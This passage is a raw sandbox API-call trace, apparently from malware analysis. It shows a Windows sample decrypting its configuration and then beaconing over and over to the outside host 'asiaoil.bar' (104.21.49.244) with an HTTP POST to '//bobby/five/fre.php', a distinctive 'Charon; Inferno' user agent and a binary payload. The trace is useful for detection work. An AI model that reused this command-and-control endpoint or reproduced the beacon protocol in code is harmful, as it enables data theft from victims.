phKey=0x19fcac*=0x74d9e8) returned 1 [0299.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.166] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0299.166] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.166] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.166] GetProcessHeap () returned 0x740000 [0299.167] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0299.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.168] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763b30, pdwDataLen=0x19fcfc | out: pbData=0x763b30, pdwDataLen=0x19fcfc) returned 1 [0299.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.169] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0299.169] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.169] CryptReleaseContext (hProv=0x75caa0, dwFlags=0x0) returned 1 [0299.170] GetProcessHeap () returned 0x740000 [0299.170] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766138 [0299.170] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0299.170] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0299.171] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0299.171] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0299.172] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0299.172] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0299.173] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0299.173] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0299.173] GetProcessHeap () returned 0x740000 [0299.173] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0299.173] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0299.174] GetProcessHeap () returned 0x740000 [0299.174] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0299.174] GetProcessHeap () returned 0x740000 [0299.174] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766138 | out: hHeap=0x740000) returned 1 [0299.174] GetProcessHeap () returned 0x740000 [0299.175] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763b30 | out: hHeap=0x740000) returned 1 [0299.175] GetProcessHeap () returned 0x740000 [0299.175] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763b30 [0299.175] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.176] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0299.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.240] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d210) returned 1 [0299.248] GetProcessHeap () returned 0x740000 [0299.248] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x7584a8 [0299.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.249] CryptImportKey (in: hProv=0x75d210, pbData=0x7584a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0299.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.250] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0299.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.251] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.251] GetProcessHeap () returned 0x740000 [0299.252] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7584a8 | out: hHeap=0x740000) returned 1 [0299.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.252] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763b30, pdwDataLen=0x19fcfc | out: pbData=0x763b30, pdwDataLen=0x19fcfc) returned 1 [0299.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.253] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0299.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.254] CryptReleaseContext (hProv=0x75d210, dwFlags=0x0) returned 1 [0299.254] GetProcessHeap () returned 0x740000 [0299.254] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765898 [0299.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0299.255] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0299.256] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0299.256] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0299.257] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0299.257] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0299.258] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0299.258] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0299.258] GetProcessHeap () returned 0x740000 [0299.258] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0299.258] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2b0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bdf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0299.259] GetProcessHeap () returned 0x740000 [0299.259] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b610 [0299.259] socket (af=2, type=1, protocol=6) returned 0x29c [0299.260] connect (s=0x29c, name=0x75c2b0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0299.279] FreeAddrInfoW (pAddrInfo=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2b0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bdf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0299.279] GetProcessHeap () returned 0x740000 [0299.279] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75cee0 [0299.279] GetProcessHeap () returned 0x740000 [0299.279] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0299.280] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0299.281] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0299.281] GetProcessHeap () returned 0x740000 [0299.281] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0299.281] GetProcessHeap () returned 0x740000 [0299.282] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0299.282] GetProcessHeap () returned 0x740000 [0299.282] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763938 [0299.282] GetProcessHeap () returned 0x740000 [0299.282] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0299.282] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0299.283] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0299.283] GetProcessHeap () returned 0x740000 [0299.283] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0299.283] GetProcessHeap () returned 0x740000 [0299.284] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0299.284] send (s=0x29c, buf=0x747928*, len=243, flags=0) returned 243 [0299.284] send (s=0x29c, buf=0x761fd0*, len=159, flags=0) returned 159 [0299.284] GetProcessHeap () returned 0x740000 [0299.284] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0299.284] recv (in: s=0x29c, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 575 [0299.455] GetProcessHeap () returned 0x740000 [0299.455] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0299.456] GetProcessHeap () returned 0x740000 [0299.456] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763938 | out: hHeap=0x740000) returned 1 [0299.456] GetProcessHeap () returned 0x740000 [0299.457] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0299.457] GetProcessHeap () returned 0x740000 [0299.457] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75cee0 | out: hHeap=0x740000) returned 1 [0299.457] closesocket (s=0x29c) returned 0 [0299.458] GetProcessHeap () returned 0x740000 [0299.458] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b610 | out: hHeap=0x740000) returned 1 [0299.458] GetProcessHeap () returned 0x740000 [0299.458] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765898 | out: hHeap=0x740000) returned 1 [0299.459] GetProcessHeap () returned 0x740000 [0299.459] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763b30 | out: hHeap=0x740000) returned 1 [0299.459] GetProcessHeap () returned 0x740000 [0299.460] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0299.460] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x103c) returned 0x29c [0299.461] Sleep (dwMilliseconds=0xea60) [0299.467] GetProcessHeap () returned 0x740000 [0299.467] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763ed8 [0299.467] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.468] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0299.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.473] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d7e8) returned 1 [0299.481] GetProcessHeap () returned 0x740000 [0299.481] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0299.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.482] CryptImportKey (in: hProv=0x75d7e8, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0299.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.483] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0299.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.484] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.484] GetProcessHeap () returned 0x740000 [0299.485] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0299.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.486] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763ed8, pdwDataLen=0x19fcfc | out: pbData=0x763ed8, pdwDataLen=0x19fcfc) returned 1 [0299.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.486] CryptDestroyKey (hKey=0x74d368) returned 1 [0299.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.487] CryptReleaseContext (hProv=0x75d7e8, dwFlags=0x0) returned 1 [0299.487] GetProcessHeap () returned 0x740000 [0299.487] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765f10 [0299.488] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0299.488] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0299.489] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0299.489] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0299.490] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0299.490] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0299.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0299.491] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0299.491] GetProcessHeap () returned 0x740000 [0299.491] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c020 [0299.491] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0299.492] GetProcessHeap () returned 0x740000 [0299.492] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c020 | out: hHeap=0x740000) returned 1 [0299.492] GetProcessHeap () returned 0x740000 [0299.492] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765f10 | out: hHeap=0x740000) returned 1 [0299.492] GetProcessHeap () returned 0x740000 [0299.493] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763ed8 | out: hHeap=0x740000) returned 1 [0299.493] GetProcessHeap () returned 0x740000 [0299.493] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763f20 [0299.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.595] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0299.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.600] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d540) returned 1 [0299.606] GetProcessHeap () returned 0x740000 [0299.606] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0299.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.607] CryptImportKey (in: hProv=0x75d540, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0299.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.608] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0299.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.609] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.609] GetProcessHeap () returned 0x740000 [0299.610] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0299.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.611] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763f20, pdwDataLen=0x19fcfc | out: pbData=0x763f20, pdwDataLen=0x19fcfc) returned 1 [0299.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.687] CryptDestroyKey (hKey=0x74d368) returned 1 [0299.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0299.688] CryptReleaseContext (hProv=0x75d540, dwFlags=0x0) returned 1 [0299.688] GetProcessHeap () returned 0x740000 [0299.688] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765ce8 [0299.689] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0299.690] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0299.691] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0299.691] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0299.692] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0299.692] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0299.693] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0299.693] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0299.693] GetProcessHeap () returned 0x740000 [0299.693] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf58 [0299.693] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c208*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0299.695] GetProcessHeap () returned 0x740000 [0299.695] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b4f0 [0299.695] socket (af=2, type=1, protocol=6) returned 0x2a0 [0299.695] connect (s=0x2a0, name=0x75c208*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0299.815] FreeAddrInfoW (pAddrInfo=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c208*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0299.815] GetProcessHeap () returned 0x740000 [0299.815] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d7e8 [0299.815] GetProcessHeap () returned 0x740000 [0299.815] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0299.816] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0299.816] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0299.816] GetProcessHeap () returned 0x740000 [0299.816] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0299.817] GetProcessHeap () returned 0x740000 [0299.817] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0299.817] GetProcessHeap () returned 0x740000 [0299.817] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763740 [0299.817] GetProcessHeap () returned 0x740000 [0299.817] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0299.818] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0299.818] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0299.818] GetProcessHeap () returned 0x740000 [0299.818] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0299.818] GetProcessHeap () returned 0x740000 [0299.819] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0299.819] send (s=0x2a0, buf=0x747928*, len=243, flags=0) returned 243 [0299.822] send (s=0x2a0, buf=0x761fd0*, len=159, flags=0) returned 159 [0299.822] GetProcessHeap () returned 0x740000 [0299.822] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0299.823] recv (in: s=0x2a0, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 573 [0300.134] GetProcessHeap () returned 0x740000 [0300.134] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0300.135] GetProcessHeap () returned 0x740000 [0300.135] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763740 | out: hHeap=0x740000) returned 1 [0300.135] GetProcessHeap () returned 0x740000 [0300.135] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0300.135] GetProcessHeap () returned 0x740000 [0300.135] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d7e8 | out: hHeap=0x740000) returned 1 [0300.135] closesocket (s=0x2a0) returned 0 [0300.136] GetProcessHeap () returned 0x740000 [0300.136] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4f0 | out: hHeap=0x740000) returned 1 [0300.136] GetProcessHeap () returned 0x740000 [0300.137] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765ce8 | out: hHeap=0x740000) returned 1 [0300.137] GetProcessHeap () returned 0x740000 [0300.137] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763f20 | out: hHeap=0x740000) returned 1 [0300.137] GetProcessHeap () returned 0x740000 [0300.137] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf58 | out: hHeap=0x740000) returned 1 [0300.137] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1040) returned 0x2a0 [0300.139] Sleep (dwMilliseconds=0xea60) [0300.286] GetProcessHeap () returned 0x740000 [0300.286] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763860 [0300.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0300.288] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0300.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0300.306] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d298) returned 1 [0300.453] GetProcessHeap () returned 0x740000 [0300.454] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0300.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0300.455] CryptImportKey (in: hProv=0x75d298, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0300.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0300.455] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0300.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0300.456] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0300.456] GetProcessHeap () returned 0x740000 [0300.457] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 